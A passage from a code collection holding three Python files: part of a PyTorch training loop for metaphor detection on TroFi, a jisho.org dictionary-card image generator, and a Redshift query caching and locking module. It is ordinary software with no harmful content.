training_sentences.extend(ten_folds[j][0])\n training_poss.extend(ten_folds[j][1])\n training_labels.extend(ten_folds[j][2])\n training_dataset_trofi = TextDataset(training_sentences, training_poss, training_labels)\n val_dataset_trofi = TextDataset(ten_folds[i][0], ten_folds[i][1], ten_folds[i][2])\n\n # Data-related hyperparameters\n batch_size = 10\n # Set up a DataLoader for the training, validation, and test dataset\n train_dataloader_trofi = DataLoader(dataset=training_dataset_trofi, batch_size=batch_size, shuffle=True,\n collate_fn=TextDataset.collate_fn)\n val_dataloader_trofi = DataLoader(dataset=val_dataset_trofi, batch_size=batch_size, shuffle=False,\n collate_fn=TextDataset.collate_fn)\n \"\"\"\n 3. Model training\n \"\"\"\n '''\n 3. 1 \n set up model, loss criterion, optimizer\n '''\n # Instantiate the model\n # embedding_dim = glove + elmo + suffix indicator\n # dropout1: dropout on input to RNN\n # dropout2: dropout in RNN; would be used if num_layers=1\n # dropout3: dropout on hidden state of RNN to linear layer\n RNNseq_model = RNNSequenceModel(num_classes=2, embedding_dim=300+1024, hidden_size=300,\n num_layers=1, bidir=True,\n dropout1=0.5, dropout2=0, dropout3=0.2)\n # Move the model to the GPU if available\n if using_GPU:\n RNNseq_model = RNNseq_model.cuda()\n # Set up criterion for calculating loss\n loss_criterion = nn.NLLLoss()\n # Set up an optimizer for updating the parameters of the rnn_clf\n rnn_optimizer = optim.Adam(RNNseq_model.parameters(), lr=0.001)\n # Number of epochs (passes through the dataset) to train the model for.\n num_epochs = 10\n\n '''\n 3. 2\n train model\n '''\n train_loss = []\n val_loss = []\n performance_matrix = None\n val_f1 = []\n val_p = []\n val_r = []\n val_acc = []\n train_f1 = []\n # A counter for the number of gradient updates\n num_iter = 0\n model_index = 0\n comparable = []\n for epoch in range(num_epochs):\n print(\"Starting epoch {}\".format(epoch + 1))\n for (__, example_text, example_lengths, labels) in train_dataloader_trofi:\n example_text = Variable(example_text)\n example_lengths = Variable(example_lengths)\n labels = Variable(labels)\n if using_GPU:\n example_text = example_text.cuda()\n example_lengths = example_lengths.cuda()\n labels = labels.cuda()\n # predicted shape: (batch_size, seq_len, 2)\n predicted = RNNseq_model(example_text, example_lengths)\n batch_loss = loss_criterion(predicted.view(-1, 2), labels.view(-1))\n rnn_optimizer.zero_grad()\n batch_loss.backward()\n rnn_optimizer.step()\n num_iter += 1\n # Calculate validation and training set loss and accuracy every 200 gradient updates\n if num_iter % 200 == 0:\n avg_eval_loss, performance_matrix = evaluate(idx2pos, val_dataloader_trofi, RNNseq_model,\n loss_criterion, using_GPU)\n val_loss.append(avg_eval_loss)\n val_p.append(performance_matrix[1][0])\n val_r.append(performance_matrix[1][1])\n val_f1.append(performance_matrix[1][2])\n val_acc.append(performance_matrix[1][3])\n print(\"Iteration {}. Validation Loss {}.\".format(num_iter, avg_eval_loss))\n# avg_eval_loss, performance_matrix = evaluate(idx2pos, train_dataloader_trofi, RNNseq_model,\n# loss_criterion, using_GPU)\n# train_loss.append(avg_eval_loss)\n# train_f1.append(performance_matrix[1][1])\n# print(\"Iteration {}. Training Loss {}.\".format(num_iter, avg_eval_loss))\n print(\"Training done for fold {}\".format(i))\n\n \"\"\"\n 3.3\n plot the training process: MET F1 and losses for validation and training dataset\n \"\"\"\n# plt.figure(0)\n# plt.title('F1 for TroFI dataset on fold ' + str(i))\n# plt.xlabel('iteration (unit:200)')\n# plt.ylabel('F1')\n# plt.plot(val_f1, 'g')\n# # plt.plot(train_f1, 'b')\n# plt.legend(['Validation F1', 'Training F1'], loc='upper right')\n# plt.show()\n\n# plt.figure(1)\n# plt.title('Loss for TroFi dataset on fold ' + str(i))\n# plt.xlabel('iteration (unit:200)')\n# plt.ylabel('Loss')\n# plt.plot(val_loss, 'g')\n# # plt.plot(train_loss, 'b')\n# plt.legend(['Validation loss', 'Training loss'], loc='upper right')\n# plt.show()\n\n \"\"\"\n store the best f1\n \"\"\"\n print('val_f1: ', val_f1)\n idx = 0\n if math.isnan(max(val_f1)):\n optimal_f1s.append(max(val_f1[6:]))\n idx = val_f1.index(optimal_f1s[-1])\n optimal_ps.append(val_p[idx])\n optimal_rs.append(val_r[idx])\n optimal_accs.append(val_acc[idx])\n else:\n optimal_f1s.append(max(val_f1))\n idx = val_f1.index(optimal_f1s[-1])\n optimal_ps.append(val_p[idx])\n optimal_rs.append(val_r[idx])\n optimal_accs.append(val_acc[idx])\n\n\n\"\"\"\nprint out the performance\nplot the performance on each fold\n\"\"\"\nprint('F1 on TroFi by 10-fold = ', optimal_f1s)\nprint('Precision on TroFi = ', np.mean(np.array(optimal_ps)))\nprint('Recall on TroFi = ', np.mean(np.array(optimal_rs)))\nprint('F1 on TroFi = ', np.mean(np.array(optimal_f1s)))\nprint('Accuracy on TroFi = ', np.mean(np.array(optimal_accs)))\n# plt.figure(2)\n# plt.title('F1 for TroFi dataset on ten folds')\n# plt.xlabel('fold')\n# plt.ylabel('F1')\n# plt.plot(optimal_ps,'r')\n# plt.plot(optimal_rs,'b')\n# plt.plot(optimal_f1s,'g')\n# plt.plot(optimal_accs,'c')\n# plt.plot([np.mean(np.array(optimal_f1s))] * 10, 'y')\n# plt.legend(['precision for each fold', 'recall for each fold', 'F1 for each fold', 'accuracy for each fold', 'Average F1'], loc='upper right')\n# plt.show()\n","sub_path":"sequence/main_trofi.py","file_name":"main_trofi.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362943621","text":"#!/usr/bin/env python\n\nimport sys, os\nimport json, urllib\nfrom urllib.parse import quote_plus\nfrom urllib.request import urlopen\nimport asyncio\nimport requests\nfrom PIL import Image, ImageFont, ImageDraw\n\nrequest = 'ケーキ'\nurl = 'http://jisho.org/api/v1/search/words?keyword=' + quote_plus(request)\nwith urlopen(url) as f:\n fdata = json.loads(f.read().decode('utf-8'))\n\ndata = fdata['data']\n#print(data)\n\n\"\"\"print(data[0]['japanese'][0]['word'] + '(' + data[0]['japanese'][0]['reading'] + ')\\n')\nprint(data[0]['senses'][0]['parts_of_speech'][0])\nprint('1. ' + data[0]['senses'][0]['english_definitions'][0])\nprint('2. ' + data[0]['senses'][1]['english_definitions'][0])\nprint('3. ' + data[0]['senses'][2]['english_definitions'][0])\"\"\"\n\nimageDir = './gen/'\nblack = (33, 33, 33, 255)\ngrey = (117, 117, 117, 255)\nwhite = (255, 255, 255, 255)\nfontTitle = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Medium.otf', 36, encoding='utf-8')\nfontMain = ImageFont.truetype(imageDir + 'Roboto-Medium.ttf', 14, encoding='utf-8')\nfontFuri = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Medium.otf', 12, encoding='utf-8')\nfontTags = ImageFont.truetype(imageDir + 'NotoSansCJKjp-Regular.otf', 10, encoding='utf-8')\nfontSmall = ImageFont.truetype(imageDir + 'Roboto-Medium.ttf', 10, encoding='utf-8')\n\ntemplate = Image.open(imageDir + 'jisho.png')\nbase = template\n\nif (data[0]['is_common']):\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_cw.png'))\n common = True\nelse:\n common = False\n\ntxt = Image.new('RGBA', base.size, (255,255,255,0))\nd = ImageDraw.Draw(txt)\n\nif (data[0]['tags'] != []):\n if (data[0]['tags'][0][:8] == 'wanikani'):\n tag = 'wanikani level ' + data[0]['tags'][0][8:]\n else:\n tag = data[0]['tags'][0]\n w, h = fontTags.getsize(tag)\n x = (100 - w) / 2\n if (common):\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_b2.png'))\n d.text((275 + x, 52), tag, font=fontTags, fill=white)\n else:\n base = Image.alpha_composite(base, Image.open(imageDir + 'jisho_b1.png'))\n d.text((275 + x, 28), tag, font=fontTags, fill=white)\n\nif ('word' in data[0]['japanese'][0]):\n d.text((24, 22), data[0]['japanese'][0]['word'], font=fontTitle, fill=black)\n w, h = fontTitle.getsize(data[0]['japanese'][0]['word'])\n W, H = fontFuri.getsize(data[0]['japanese'][0]['reading'])\n x = (w - W) / 2\n d.text((24 + x, 16), data[0]['japanese'][0]['reading'], font=fontFuri, fill=black)\nelse:\n d.text((24, 22), data[0]['japanese'][0]['reading'], font=fontTitle, fill=black)\n\ni = 0\nwordType = ''\nfor x in data[0]['senses'][0]['parts_of_speech']:\n if (i > 0):\n wordType += ', '\n wordType += x\n i += 1\nd.text((24, 77), wordType, font=fontSmall, fill=grey)\n\nix = 1\ni = 0\ndesc = '\\n'\ndescN = '\\n'\nfor x in data[0]['senses']:\n if (ix > 6):\n break\n if (i > 0):\n desc += '\\n'\n descN += '\\n'\n\n if (x['parts_of_speech'] != [] and ix > 1):\n if (ix > 5):\n break\n ii = 0\n wordType = ''\n for y in x['parts_of_speech']:\n if (ii > 0):\n wordType += ', '\n wordType += y\n ii += 1\n d.text((24, 77 + (ix * 17)), wordType, font=fontSmall, fill=grey)\n desc += '\\n'\n descN += '\\n'\n ix += 1\n\n descN += str(i + 1) + '.'\n descL = ''\n ii = 0\n for y in x['english_definitions']:\n if (ii > 0):\n descL += '; '\n descL += y\n ii += 1\n\n if (len(descL) > 48):\n desc += descL[:48] + '...'\n else:\n desc += descL\n\n i += 1\n ix += 1\n\nd.text((24, 72), descN, font=fontMain, fill=grey)\nd.text((40, 72), desc, font=fontMain, fill=black)\n\n\nout = Image.alpha_composite(base, txt)\nout.save(imageDir + 'output/output.png', 'PNG')\n","sub_path":"jisho.py","file_name":"jisho.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"631952177","text":"import calendar\nimport collections\nimport gzip\nimport hashlib\nimport logging\nimport resource\nimport time\nimport zlib\nfrom copy import copy\nfrom csv import DictWriter\nfrom datetime import date, datetime, timedelta\nfrom enum import Enum, IntEnum\nfrom inspect import isclass\nfrom io import BytesIO, StringIO\nfrom itertools import chain\nfrom threading import Lock\nfrom types import MappingProxyType\nfrom uuid import uuid4\n\nimport pytz\nimport simplejson as json\nfrom _csv import reader\nfrom redis_lock import Lock as RedisLock\nfrom six import add_metaclass\n\nfrom hsredshift.analytics.filters import (\n\tget_filter, is_filter_param, lookup_filter_for_bind_param\n)\nfrom hsredshift.analytics.queries import RedshiftCatalogue\nfrom hsredshift.analytics.scheduling import (\n\tQueryRefreshPriority, RedshiftQueryMetaLockTimeoutError\n)\nfrom hsredshift.utils.encoders import HSRedshiftJSONEncoder\nfrom hsredshift.utils.sql import (\n\tQueryStatementGenerator, get_engine_from_environ,\n\tis_in_flight, run_redshift_background_statement\n)\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass QueryDisplayVisual(IntEnum):\n\t\"\"\"\n\t\t# TABLE Result Sets Should be Structured As Follows:\n\t\ttable_result = {\n\t\t\t\"render_as\": \"list_table\",\n\t\t\t\"series\": {\n\t\t\t\t\t\"metadata\": {\n\t\t\t\t\t\t\"DRUID\": {},\n\t\t\t\t\t\t\"HUNTER\": {},\n\t\t\t\t\t\t\"MAGE\": {},\n\t\t\t\t\t\t\"PALADIN\": {},\n\t\t\t\t\t\t\"PRIEST\": {},\n\t\t\t\t\t\t\"ROGUE\": {},\n\t\t\t\t\t\t\"SHAMAN\": {},\n\t\t\t\t\t\t\"WARLOCK\": {},\n\t\t\t\t\t\t\"WARRIOR\": {},\n\t\t\t\t\t},\n\t\t\t\t\t\"data\": {\n\t\t\t\t\t\t\"DRUID\": [\n\t\t\t\t\t\t\t{},\n\t\t\t\t\t\t\t{},\n\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t],\n\t\t\t\t\t\t\"HUNTER\": [],\n\t\t\t\t\t\t\"MAGE\": [],\n\t\t\t\t\t\t\"PALADIN\": [],\n\t\t\t\t\t\t\"PRIEST\": [],\n\t\t\t\t\t\t\"ROGUE\": [],\n\t\t\t\t\t\t\"SHAMAN\": [],\n\t\t\t\t\t\t\"WARLOCK\": [],\n\t\t\t\t\t\t\"WARRIOR\": [],\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t}\n\n\t\t# CHART Result Sets Should Be Structured As Follows:\n\t\tchart_result = {\n\t\t\t\"render_as\": \"line_chart\",\n\t\t\t\"series\": [\n\t\t\t\t{\n\t\t\t\t\t\"name\": \"foo\",\n\t\t\t\t\t\"metadata\": {\n\t\t\t\t\t\t\"is_winrate_data\": True,\n\t\t\t\t\t\t\"num_data_points\": 100\n\t\t\t\t\t},\n\t\t\t\t\t\"data\": [\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"x\": None,\n\t\t\t\t\t\t\t\"y\": None\n\t\t\t\t\t\t},\n\t\t\t\t\t\t# ....\n\t\t\t\t\t]\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t\"\"\"\n\tCHART = 0\n\tTABLE = 1\n\n\nclass QueryRefreshInterval(Enum):\n\tNEVER = (0, -1)\n\tHOURLY = (1, 3600)\n\tEVERY_TWO_HOURS = (2, 7200)\n\tEVERY_THREE_HOURS = (3, 10800)\n\tEVERY_SIX_HOURS = (4, 21600)\n\tDAILY = (5, 86400)\n\n\tdef __init__(self, index, max_seconds):\n\t\tself.index = index\n\t\tself.max_seconds = max_seconds\n\n\nclass InvalidOrMissingQueryParameterError(Exception):\n\tdef __init__(self, message, query_name, parameter_name, value=None):\n\t\tsuper(InvalidOrMissingQueryParameterError, self).__init__(message)\n\t\tself.query_name = query_name\n\t\tself.parameter_name = parameter_name\n\t\tself.value = value\n\n\nclass RedshiftQueryMetaContextManager:\n\t\"\"\"A Reentrant Context Manager for synchronizing write access across Lambdas\"\"\"\n\tdef __init__(self, parameterized_query, global_context=False):\n\t\tself.global_context = global_context\n\t\tself.parameterized_query = parameterized_query\n\t\tself.cache = self.parameterized_query.catalogue.cache\n\t\tself.namespace = self.parameterized_query.catalogue.s3_unload_namespace\n\n\t\tif self.global_context:\n\t\t\tself.cache_key_meta = self.parameterized_query.unload_key\n\t\telse:\n\t\t\tself.cache_key_meta = self.parameterized_query.cache_key_meta\n\n\t\tself.lock_name = \"%s_%s\" % (self.namespace, self.cache_key_meta)\n\t\tself.serial_meta_access = self.parameterized_query.catalogue.serialize_meta_access\n\t\tself.cache_ttl_seconds = self.parameterized_query.query.cache_ttl_seconds\n\t\tself.meta = None\n\n\t\tif self.serial_meta_access:\n\t\t\t# This ensures no race conditions mutating the meta dict between Lambdas\n\t\t\tself.lock = RedisLock(\n\t\t\t\tself.cache,\n\t\t\t\tself.lock_name,\n\t\t\t\texpire=60,\n\t\t\t\tauto_renewal=True\n\t\t\t)\n\t\telse:\n\t\t\t# For testing this allows use of FakeRedis\n\t\t\tself.lock = Lock()\n\n\t\tself.depth = 0\n\t\tself.acquired = False\n\n\tdef __enter__(self):\n\t\t\"\"\"Blocks until we have exclusive write access to the query meta dict\n\n\t\tRaises RedshiftQueryMetaLockTimeoutError if the lock could not be\n\t\tacquired within the configured timeout. This might happen when an\n\t\tUNLOADed result set is taking a long time to be inserted into Redis.\n\t\t\"\"\"\n\n\t\tif not self.acquired:\n\t\t\tself.acquired = self.lock.acquire(\n\t\t\t\ttimeout=self.parameterized_query.query.meta_lock_wait_seconds\n\t\t\t)\n\t\t\tif not self.acquired:\n\t\t\t\traise RedshiftQueryMetaLockTimeoutError()\n\n\t\t\tif self.cache.exists(self.cache_key_meta):\n\t\t\t\tself.meta = json.loads(self.cache.get(self.cache_key_meta))\n\t\t\telse:\n\t\t\t\tself.meta = {}\n\n\t\tself.depth += 1\n\t\treturn self.meta\n\n\tdef __exit__(self, *exc):\n\t\tself.depth -= 1\n\t\tif self.depth == 0:\n\t\t\tmeta_val = json.dumps(\n\t\t\t\tself.meta,\n\t\t\t\tcls=HSRedshiftJSONEncoder,\n\t\t\t\tseparators=(\",\", \":\"),\n\t\t\t)\n\t\t\tself.cache.set(self.cache_key_meta, meta_val, ex=self.cache_ttl_seconds)\n\t\t\tself.lock.release()\n\t\t\tself.acquired = False\n\n\t\treturn False\n\n\nclass ParameterizedRedshiftQuery(object):\n\n\tdef __init__(self, query, supplied_parameters):\n\t\tself.query = query\n\t\tself.supplied_parameters = supplied_parameters\n\t\tself.verify_required_parameters(supplied_parameters)\n\n\t\tself.has_premium_values = False\n\n\t\tself.final_bind_params = {}\n\n\t\tfor param_name, bind in query.bind_params().items():\n\t\t\tfinal_val = None\n\n\t\t\t# Attempt to come up with a final_val for this param\n\t\t\t# First check whether it was provided directly, e.g. card_id\n\t\t\tif param_name in supplied_parameters:\n\t\t\t\tval_from_args = supplied_parameters[param_name]\n\t\t\t\tfinal_val = self._convert_val_to_bind_type(val_from_args, bind)\n\n\t\t\t# Second, check whether it was provided as a Filter Enum\n\t\t\tfilter = lookup_filter_for_bind_param(param_name)\n\t\t\tif final_val is None and filter:\n\t\t\t\tfilter_member = None\n\t\t\t\tfilter_name = filter.filter_name()\n\t\t\t\tif filter_name in supplied_parameters:\n\t\t\t\t\tsupplied_params_filter_val = supplied_parameters[filter_name]\n\t\t\t\t\tif supplied_params_filter_val in filter.__members__:\n\t\t\t\t\t\tfilter_member = filter[supplied_params_filter_val]\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = \"Invalid member %s for filter %s for query: %s\" % (\n\t\t\t\t\t\t\tsupplied_params_filter_val, filter_name, self.query.name\n\t\t\t\t\t\t)\n\t\t\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, filter_name)\n\n\t\t\t\tif filter_member and not self.query.is_supported_filter_member(filter, filter_member):\n\t\t\t\t\tmsg = \"%s is not supported or enabled for query: %s\" % (\n\t\t\t\t\t\tfilter_member.name, self.query.name\n\t\t\t\t\t)\n\t\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, filter_name)\n\n\t\t\t\tif filter_member is None:\n\t\t\t\t\tfilter_member = self.query.get_default_value_for_filter(filter)\n\n\t\t\t\tif self.query.is_premium or self.query.filter_member_is_premium(filter, filter_member):\n\t\t\t\t\tself.has_premium_values = True\n\n\t\t\t\tfinal_val = filter.resolve_bind_param(param_name, filter_member)\n\n\t\t\t# If we don't have a value then check if there is a default\n\t\t\tif final_val is None and bind.value:\n\t\t\t\tfinal_val = bind.value\n\n\t\t\t# If there is no default then check whether it's required (raise exception if it is)\n\t\t\tif final_val is None and bind.required:\n\t\t\t\tmsg = \"Required argument %s has not been provided\" % param_name\n\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, param_name)\n\n\t\t\tif final_val is not None:\n\t\t\t\tself.final_bind_params[param_name] = final_val\n\n\tdef verify_required_parameters(self, supplied_parameters):\n\t\tfor param in self.query.required_parameters:\n\t\t\tif param not in supplied_parameters:\n\t\t\t\tmsg = \"Required param %s was not provided\" % param\n\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, param)\n\n\tdef _convert_val_to_bind_type(self, val, bind):\n\t\tconverter = bind.type.python_type\n\t\tif converter == date:\n\t\t\treturn datetime.strptime(val, \"%Y-%m-%d\").date()\n\t\telse:\n\t\t\treturn converter(val)\n\n\t@property\n\tdef catalogue(self):\n\t\treturn self.query.catalogue\n\n\t@property\n\tdef is_global(self):\n\t\treturn self.query.global_query\n\n\t@property\n\tdef is_personalized(self):\n\t\treturn self.query.is_personalized\n\n\t@property\n\tdef is_backfillable(self):\n\t\treturn self.query.is_backfillable\n\n\t@property\n\tdef fully_qualified_parameters(self):\n\t\tresult = {}\n\t\tfor available_param in self.query.available_parameters:\n\t\t\tif available_param in self.supplied_parameters:\n\t\t\t\tresult[available_param] = self.supplied_parameters[available_param]\n\t\t\telif is_filter_param(available_param):\n\t\t\t\tdefault_val = self.query.get_default_value_for_filter(\n\t\t\t\t\tget_filter(available_param)\n\t\t\t\t)\n\t\t\t\tresult[available_param] = str(default_val.name)\n\t\t\telse:\n\t\t\t\tresult[available_param] = \"NOT_PROVIDED\"\n\t\treturn result\n\n\t@property\n\tdef supplied_filters_dict(self):\n\t\t# This is mostly useful for capturing metrics related to what is being requested.\n\t\t# It's useful to be able to separate params that are filters and have a small bounded\n\t\t# range of values. And those that have an unbounded range for use with tools like\n\t\t# Influx that treat tags and fields differently.\n\t\tresults = {}\n\t\tfor k, v in self.fully_qualified_parameters.items():\n\t\t\tif is_filter_param(k):\n\t\t\t\tresults[k] = str(v)\n\n\t\treturn results\n\n\t@property\n\tdef supplied_non_filters_dict(self):\n\t\tresults = {}\n\t\tfor k, v in self.fully_qualified_parameters.items():\n\t\t\tif not is_filter_param(k):\n\t\t\t\tresults[k] = str(v)\n\n\t\treturn results\n\n\t@property\n\tdef executable_sql(self):\n\t\tengine = self.catalogue.engine\n\t\tcompiled_statement = self.query.stmt.params(\n\t\t\tself.final_bind_params\n\t\t).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn q.query\n\n\tdef generate_unload_key(self, prefix=\"\"):\n\t\tnamespace = self.catalogue.s3_unload_namespace\n\t\treturn \"%s/%s/%s/%s_\" % (namespace, self.query_name, self.unload_key, str(prefix))\n\n\tdef generate_unload_location(self, prefix=\"\"):\n\t\ts3_bucket = self.catalogue.s3_unload_bucket\n\t\treturn \"s3://%s/%s\" % (s3_bucket, self.generate_unload_key(prefix))\n\n\tdef executable_unload_statement(self, prefix=\"\"):\n\t\tengine = self.catalogue.engine\n\t\taws_access_key_id = self.catalogue.aws_access_key_id\n\t\taws_secret_access_key = self.catalogue.aws_secret_access_key\n\n\t\tcompiled_statement = self.query.stmt.params(\n\t\t\tself.final_bind_params\n\t\t).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\tunload_location = self.generate_unload_location(prefix)\n\n\t\tunload_template = \"\"\"\n\t\t\tUNLOAD ('{select}') TO '{unload_location}'\n\t\t\tACCESS_KEY_ID '{aws_access_key_id}'\n\t\t\tSECRET_ACCESS_KEY '{aws_secret_access_key}'\n\t\t\tMANIFEST\n\t\t\tGZIP\n\t\t\tDELIMITER AS ','\n\t\t\tMAXFILESIZE AS 10 MB\n\t\t\tADDQUOTES\n\t\t\tNULL AS '_N_'\n\t\t\tPARALLEL OFF\n\t\t\tALLOWOVERWRITE\n\t\t\"\"\"\n\n\t\tstmt = unload_template.format(\n\t\t\tselect=q.query.replace(\"'\", r\"\\'\"),\n\t\t\tunload_location=unload_location,\n\t\t\taws_access_key_id=aws_access_key_id,\n\t\t\taws_secret_access_key=aws_secret_access_key\n\t\t)\n\n\t\treturn stmt\n\n\tdef __str__(self):\n\t\treturn self.cache_key\n\n\tdef __repr__(self):\n\t\treturn str(self)\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, ParameterizedRedshiftQuery):\n\t\t\treturn self.cache_key == other.cache_key\n\t\treturn NotImplemented\n\n\tdef schedule_refresh(self, priority=None):\n\t\trefresh_priority = priority or self.query.refresh_priority\n\t\tif refresh_priority == QueryRefreshPriority.IMMEDIATE:\n\t\t\tself.refresh_result(run_async=True)\n\t\telse:\n\t\t\tself.catalogue.scheduler._schedule_refresh(self, refresh_priority)\n\n\tdef preschedule_refresh(self):\n\t\tif self.will_be_stale_at:\n\t\t\tself.catalogue.scheduler._preschedule_refresh(self, self.will_be_stale_at)\n\n\t@property\n\tdef will_be_stale_at(self):\n\t\tif self.query.refresh_interval == QueryRefreshInterval.NEVER:\n\t\t\treturn None\n\t\telse:\n\t\t\ttd = timedelta(seconds=self.query.refresh_interval.max_seconds)\n\t\t\treturn self.result_as_of + td\n\n\t@property\n\tdef refresh_as_of_key(self):\n\t\tprefix = self.query.cache_key_prefix + \":refresh_as_of\"\n\t\toverride_vals = {}\n\t\tfor exclusion in self.query.exclude_from_global_permutations_key:\n\t\t\toverride_vals[exclusion] = \"*\"\n\n\t\treturn self._generate_cache_key([], override_vals=override_vals, prefix=prefix)\n\n\t@property\n\tdef unload_key(self):\n\t\tprefix = self.query.cache_key_prefix + \":unload=True\"\n\t\toverride_vals = {}\n\t\tfor exclusion in self.query.exclude_from_global_permutations_key:\n\t\t\toverride_vals[exclusion] = \"*\"\n\n\t\treturn self._generate_cache_key([], override_vals=override_vals, prefix=prefix)\n\n\t@property\n\tdef refresh_as_of(self):\n\t\tcache = self.query.catalogue.cache\n\t\tas_of_ts = cache.get(self.refresh_as_of_key)\n\t\tif as_of_ts:\n\t\t\treturn datetime.utcfromtimestamp(float(as_of_ts))\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef cache_key(self):\n\t\treturn self._generate_cache_key([])\n\n\tdef _generate_cache_key(self, exclusions, override_vals={}, prefix=None):\n\t\tif prefix:\n\t\t\telements = [prefix]\n\t\telse:\n\t\t\telements = [self.query.cache_key_prefix]\n\n\t\tfor available_param in self.query.available_parameters:\n\t\t\tif available_param in exclusions:\n\t\t\t\tcontinue\n\t\t\tif available_param in override_vals:\n\t\t\t\telement = \"%s=%s\" % (available_param, override_vals[available_param])\n\t\t\t\telements.append(element)\n\t\t\telif available_param in self.supplied_parameters:\n\t\t\t\telement = \"%s=%s\" % (available_param, self.supplied_parameters[available_param])\n\t\t\t\telements.append(element)\n\t\t\telif available_param in self.query.required_parameters:\n\t\t\t\traise ValueError(\"Required cache_key_element not found in supplied_parameters: %s\" % available_param)\n\t\t\telse:\n\t\t\t\tif is_filter_param(available_param):\n\t\t\t\t\tfilter = get_filter(available_param)\n\t\t\t\t\tdefault_member = self.query.get_default_value_for_filter(filter)\n\t\t\t\t\telement = \"%s=%s\" % (available_param, default_member.name)\n\t\t\t\telse:\n\t\t\t\t\tdefault_value = self.query.get_default_value(available_param)\n\t\t\t\t\telement = \"%s=%s\" % (available_param, default_value)\n\t\t\t\telements.append(element)\n\n\t\treturn \":\".join(elements)\n\n\t@property\n\tdef cache_key_meta(self):\n\t\treturn self.cache_key + \":meta\"\n\n\t@property\n\tdef query_name(self):\n\t\treturn self.query.name\n\n\t@property\n\tdef params_cache_key(self):\n\t\treturn self.cache_key + \":params\"\n\n\tdef evict_cache(self):\n\t\tcache = self.catalogue.cache\n\t\tcache.delete(self.cache_key)\n\t\tcache.delete(self.params_cache_key)\n\t\tcache.delete(self.refresh_as_of_key)\n\t\tcache.delete(self.cache_key_meta)\n\n\tdef evict_all_from_cache(self):\n\t\treturn self.query.evict_all_from_cache()\n\n\tdef mark_stale(self):\n\t\twith self.get_meta_context() as meta:\n\t\t\tmeta[\"is_stale\"] = True\n\n\tdef mark_all_stale(self):\n\t\treturn self.query.mark_all_stale()\n\n\t@property\n\tdef result_as_of(self):\n\t\tmeta = self.read_only_meta\n\t\tas_of_ts = meta.get(\"as_of\", None)\n\t\tif as_of_ts and not self.cached_records_are_invalid:\n\t\t\treturn datetime.utcfromtimestamp(float(as_of_ts))\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef read_only_meta(self):\n\t\tif self.catalogue.cache.exists(self.cache_key_meta):\n\t\t\treturn MappingProxyType(\n\t\t\t\tjson.loads(self.catalogue.cache.get(self.cache_key_meta))\n\t\t\t)\n\t\telse:\n\t\t\treturn MappingProxyType(dict())\n\n\t@property\n\tdef read_only_global_meta(self):\n\t\tif self.catalogue.cache.exists(self.unload_key):\n\t\t\treturn MappingProxyType(\n\t\t\t\tjson.loads(self.catalogue.cache.get(self.unload_key))\n\t\t\t)\n\t\telse:\n\t\t\treturn MappingProxyType(dict())\n\n\tdef get_meta_context(self):\n\t\tif not hasattr(self, \"_meta_context\"):\n\t\t\tself._meta_context = RedshiftQueryMetaContextManager(self)\n\t\treturn self._meta_context\n\n\tdef get_global_meta_context(self):\n\t\tif not hasattr(self, \"_global_meta_context\"):\n\t\t\tself._global_meta_context = RedshiftQueryMetaContextManager(\n\t\t\t\tself,\n\t\t\t\tglobal_context=True\n\t\t\t)\n\t\treturn self._global_meta_context\n\n\t@property\n\tdef cache_is_populated(self):\n\t\tif self.refresh_as_of and not self.cached_records_are_invalid:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef cached_records_are_invalid(self):\n\t\t# This is true when the query SQL is changed.\n\t\t# Any result records in the cache are considered invalid\n\t\tmeta = self.read_only_meta\n\t\tif meta:\n\t\t\treturn meta.get(\"query_hash\", None) != self.query.query_hash\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef result_available(self):\n\t\tcache = self.query.catalogue.cache\n\t\tif self.cached_records_are_invalid:\n\t\t\t# If the query_hash has changed then the records are for an old version\n\t\t\t# of the query and are not usable\n\t\t\treturn False\n\n\t\treturn cache.exists(self.cache_key)\n\n\t@property\n\tdef result_is_stale(self):\n\t\tif self.cached_records_are_invalid:\n\t\t\treturn True\n\n\t\tmeta = self.read_only_meta\n\t\tif not meta or meta.get(\"is_stale\", False):\n\t\t\treturn True\n\n\t\tcurrent_dt = datetime.utcnow()\n\t\tcached_as_of_dt = self.result_as_of\n\t\tif not cached_as_of_dt:\n\t\t\treturn True\n\n\t\tseconds_stale = (current_dt - cached_as_of_dt).total_seconds()\n\t\tif self.query.refresh_interval == QueryRefreshInterval.NEVER:\n\t\t\treturn False\n\t\telif seconds_stale > self.query.refresh_interval.max_seconds:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef response_payload_type(self):\n\t\tif self.query.as_csv:\n\t\t\treturn \"text/csv\"\n\t\telse:\n\t\t\treturn \"application/json\"\n\n\t@property\n\tdef response_payload_data(self):\n\t\treturn self._get_response_payload(as_json=True)\n\n\t@property\n\tdef response_payload(self):\n\t\treturn self._get_response_payload(as_json=False)\n\n\t@property\n\tdef response_payload_json(self):\n\t\treturn self._get_response_payload(as_json=True)\n\n\tdef _get_response_payload(self, as_json=False):\n\t\tcache = self.query.catalogue.cache\n\t\tval = cache.get(self.cache_key)\n\t\tif val is None:\n\t\t\tif self.query.raw_series_data:\n\t\t\t\treturn 